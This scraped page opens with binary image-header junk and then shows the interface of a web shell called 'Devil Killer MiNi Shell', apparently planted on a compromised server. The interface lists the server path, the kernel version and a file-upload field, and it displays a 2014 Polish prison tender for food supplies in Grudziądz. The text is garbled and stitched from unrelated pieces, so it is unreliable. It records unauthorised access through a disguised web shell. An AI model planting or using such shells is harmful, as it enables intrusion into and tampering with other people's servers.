JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140606/123253-N-2014.html

<p class="kh_header"><b>Grudziądz: Dostawy różnych artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 123253 - 2014; data zamieszczenia: 06.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Nr 1 , ul. Wybickiego 10/22, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 64 40 400, faks 56 64 40 499.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl-link zamówienia publiczne-OISW w Bydgoszczy-Zakład Karny Nr 1 w Grudziądzu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy różnych artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> cz.1

ARTYKUŁY ZBOŻOWE - przedmiot zamówienia:

Lp.Nazwa artykułu	CPV	Norma	ZK1	ZK2-OZ	Razem
1.Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo - mącznych i innych pozostałości	15612100-2	PN-A-74022	7 000 kg	4780 kg	11780 kg
2.Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi ziemniaczanej;
- postać i barwa - biały proszek; 15623000-1 PN-A-74710   30 kg	___	30 kg
3.Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg; 15851100-2  PN-A-74131	7 000 kg	1360 kg	8360 kg
4.Makaron:
- typu nitki
- opakowanie - 1 kg - 25 kg;  15851100-2  PN-A-74131	____ 1300 kg  1300 kg
5.Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg; 15613100-8  PN-887A-7403 2 000 kg 1850 kg 3850 kg
6.Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych pozostałości; 15613100-8 PN-88/A-74203     2 000 kg	650 kg	2650 kg
7.Ryż biały:
- opakowanie - 1 kg - 25 kg; 15614100-6 PN-A-74220 7 000 kg 1520 kg 8520 kg

cz.2 
BULIONY - przedmiot zamówienia:
Lp.	Nazwa artykułu	CPV	Norma	ZK1	ZK2 -OZ	Razem
1.	Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15892000-7	PN-A-75980:1997	1 500 kg	____ 1 500 kg
2. Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15891500-5	PN-A-97052 1 000 kg ____	1000 kg
3.Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15891500-5	PN-A-94050	10 kg	____	10 kg
4.Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15891400-4	PN-A-94050:1996	200 kg	____	200 kg
5.Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15891400-4	PN-A-94050	200 kg	320 kg	520 kg
6.Zupa pieczarkowa w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15891400-4	PN-A-94050	____	68 kg	68 kg
7.Przyprawa jarzynka w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy 15890000-3	PN-A-94050	______	1190 kg	1190 kg
8.Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15890000-3 PN-A-94052	2 000 l	640 l	2640 l
9.Bulion z kury w proszku
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy  15891500-5 PN-A-94052:1996	____1620 kg  1620 kg
cz. 3
CUKIER - przedmiot zamówienia
Lp.Nazwa artykułu	CPV	Norma	ZK1	ZK2-OZ	Razem
1.Cukier biały kryształ:
- opakowanie max. do 25 kg	15831200-4 PN-A-74850 3 000 kg 4700 kg 7700 kg

cz. 4
RÓŻNE ARTYKUŁY SPOŻYWCZE I PRZYPRAWY - przedmiot zamówienia
Lp.Nazwa artykułu	CPV	Norma	ZK1	  ZK2-OZ	Razem
1.Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15831000-2	BN-79-8133-01	50 kg___	50 kg
2.Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15613311-1	PN-A-88036:1998 200 kg	 ___	200 kg
3.Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;  15871200-6	PN-R-87022	40 kg	3 kg	43 kg
4.Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; 15882000-4	PN-A-88115:1998	250 kg	___	250 kg
5.Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15620000-0 PN-A-94051	200 kg	------	200 kg
6.Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4PN-A-86967	30 kg	6 kg	36 kg
7.Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15833100-7PN-94/A-75104	100 kg	____	100 kg
8.Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15863000-5PN-ISO 3720	 800 kg	330 kg	1130 kg
9.Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15861000-1 PN-A-94013	1 700 kg	580 kg	2280 kg
10.Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15620000-0 PN-A-94051	200 kg	120 kg	320 kg
11.Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;
15890000-3	PN-81/A-79734	50 kg	24 kg	74 kg
12.Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4 PN-R-87022	40 kg	24 kg	64 kg
13.Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;  15872000-1	PN-A-86958	40 kg	35 kg	75 kg
14.Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871273-8 PN-A-86950:1995	900 kg	_____	900 kg

15.Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871250-1PN-A-86964	1 000 kg	153 kg	1153 kg
16.Ocet 10% 0,5 l	15871120-1	PN-72/A-79733	600 l	236 l	836 l
17.Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4PN-A-86955	40 kg	47 kg	87 kg
18.Papryka mielona słodka:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4 PN-A-86955	______	47 kg	47 kg
19.Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15872100-2 PN-A-86965	120 kg	59 kg	179 kg
20.Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15899000-6 PN-A-94017:1998	20 kg	____	20 kg
21.Sól kuchenna:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy, 15872400-5	PN-C-84081	3 000 kg	1250 kg	4250 kg
22.Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7 BN-67/8132-14 40 kg	24 kg	64 kg
23.Bazylia suszona:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7BN-67/8132-14	___	4 kg	4 kg
24.Chili w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	15871000-4 PN-A-86955	___	3 kg	3 kg
25.Cynamon w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15871000-4 PN-A-86955	_____	1 kg	1 kg
26.Kminek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7 BN-67/8132-14	___	5 kg	5 kg
27.Oregano suszone:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7 BN-67/8132-14	____	5 kg	5 kg
28.Przyprawa do mięsa mielonego:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7 BN-67/8132-14	____	7 kg	7 kg
29.Zioła prowansalskie suszone:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15870000-7 BN-67/8132-14	____	2 kg	2 kg

30.Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15892000-7 PN-A-82245:1993	50 kg	____	50 kg

cz. 5
PRODUKTY SOJOWE - przedmiot zamówienia
Lp.Nazwa artykułu	CPV	Norma	ZK1	ZK2-OZ	Razem
1.Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3 PN-ISO 5506	 600 kg	100 kg	700 kg
2.Kotlety sojowe:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3 PN-ISO 5506	____	94 kg	94 kg
3.Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15890000-3PN-ISO 5506	 500 kg	100 kg	600 kg

cz. 6
PRODUKTY STRĄCZKOWE - przedmiot zamówienia
Lp.Nazwa artykułu	CPV	Norma	ZK 1	ZK2-OZ	Razem
1.Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15331130-7 PN-75/R-65031	2 500 kg	1445 kg	3945 kg
2.Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	15311133-8 PN-A-74220:1997	2 000 kg	800 kg	2800 kg

cz. 7
PRZETWORY WARZYWNE - przedmiot zamówienia

Lp.Nazwa artykułu	CPV	Norma	ZK1	ZK2	Razem
1.Chrzan tarty:
- opakowanie jednostkowe- słoiki do 0,9 l
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	15331400-1 PN/R-75520	50 kg	105 kg	155 kg
2.Fasolka konserwowa:
- op.2500- 3000 ml, długość ok. 5 cm, kolor zielony, bez łyka, zalewa klarowna;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	15331464-7 PN-V-74016:2001	200 kg	___	200 kg
3.Groszek konserwowy:
- op. 2500-3500 ml, kolor zielony, soczysty, ziarna całe, nie zepsute, bez obcych zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	15331462-3 PN-76/A-77803	900 kg	485 kg	1385 kg
4.Koncentrat pomidorowy 30%:
- opakowanie - puszka 4500g;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	15331427-6 PN-75/A-77601	3 000 kg	1790 kg	4790 kg
5.Kukurydza konserwowa:
- op. 2500-3000 ml, ziarna młodej kukurydzy luzem w zalewie konserwującej, ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania, konsystencja miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	
15331470-2	PN-A-77807	600 kg	120 kg	720 kg
6.Leczo pieczarkowe:
- produkt spożywczy otrzymany ze świeżych warzyw i grubo pokrojonych pieczarek z dodatkiem soli kuchennej, utrwalony przez pasteryzację;
- konsystencja - półpłynna do gęstej, z widocznymi kawałkami warzyw i pieczarek;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	15331135-2 PN-A-86951:2006	1 500 kg	1075 kg	2575 kg
7.	Papryka czerwona mrożona:
- op. do 5 kg
- termin przydatności do spożycia min. 12 miesięcy od dostawy;
15331170-9	PN-A-94001:1999P ____	472 kg	472 kg
8.Ogórki konserwowe całe:
- op.2500-4000 ml, termin przydatności do spożycia min. 12 miesięcy, produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym, struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych;	15331500-2	PN-A-77801 	400 kg	___	400 kg

cz. 8
PRZETWORY OWOCOWE  - przedmiot zamówienia
Lp.	Nazwa artykułu	CPV	Norma	ZK1	ZK2-OZ	Razem
1.	Dżem:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	
15332290-3	PN-A-75100	10 kg	127 kg	137 kg
2.Miód:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 15831600-8	PN-88/A77626	20 kg	400 kg	420 kg
3.Dżem:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 15332290-3	PN-A-75100	4 000 kg	 755 kg	4755 kg
4.Marmolada:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 15332230-5	PN-93/A-75103	4 000 kg	1080 kg	5080 kg
5.Kompot truskawkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd -widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu truskawkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy;  15332100-5	PN-75/A-75953	800 l ____	800 l
6.Mieszanka owocowa mrożona:
- op. do 5 kg
- termin przydatności do spożycia min. 12 miesięcy od dostawy;	15331100-8 PN-A-78652:1997/:A z 1:2002	____	395 kg	395 kg
7.Dżem truskawkowy
- w opakowaniach jednostkowych do 15 kg,
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 15332290-3	PN-A-75100	____	650 kg	650 kg
8.Kompot śliwkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu śliwkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy; 	15332100-5	PN-75/A-75953	200 l ___	 200 l.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.00-2, 15.61.31.00-8, 15.61.41.00-6, 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3, 15.83.12.00-4, 15.83.10.00-2, 15.61.33.11-1, 15.88.20.00-4, 15.62.00.00-0, 15.87.10.00-4, 15.83.31.00-7, 15.86.30.00-5, 15.86.10.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.11.20-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl-link zamówienia publiczne-OISW w Bydgoszcy-Zakład Karny Nr 1 w Grudziądzu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 1 ul. Wybickiego 10/22, 86-300 Grudziądz - Dział Kwatermistrzowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 07:50, miejsce: Zakład Karny Nr 1 ul. Wybickiego 10/22, 86-300 Grudziądz - Sekretariat.</p>
